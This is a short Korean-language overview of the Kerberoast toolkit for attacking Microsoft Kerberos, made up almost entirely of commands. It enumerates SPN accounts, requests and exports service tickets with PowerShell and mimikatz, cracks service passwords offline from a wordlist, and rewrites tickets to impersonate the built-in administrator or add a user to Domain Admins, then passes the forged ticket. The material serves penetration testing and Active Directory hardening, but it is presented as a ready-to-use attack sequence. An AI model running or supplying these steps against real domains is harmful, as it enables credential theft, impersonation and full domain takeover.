
MS Kerberos 구현 공격용 툴킷: SPN 계정 추출, 티켓 요청 및 내보내기, 서비스 비밀번호 크래킹, 가장 및 권한 상승을 위한 티켓 재작성.
Kerberoast는 MS Kerberos 구현을 공격하기 위한 일련의 도구입니다. 아래는 각 도구가 수행하는 작업에 대한 간략한 개요입니다.
PS C:\> setspn -T medin -Q */*
하나의 티켓:
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
모든 티켓
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
mimikatz # kerberos::list /export
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
사용자가 다른 사용자처럼 보이게 만들기
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500
사용자를 다른 그룹에 추가 (이 경우 Domain Admin)
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512
kerberos::ptt sql.kirbi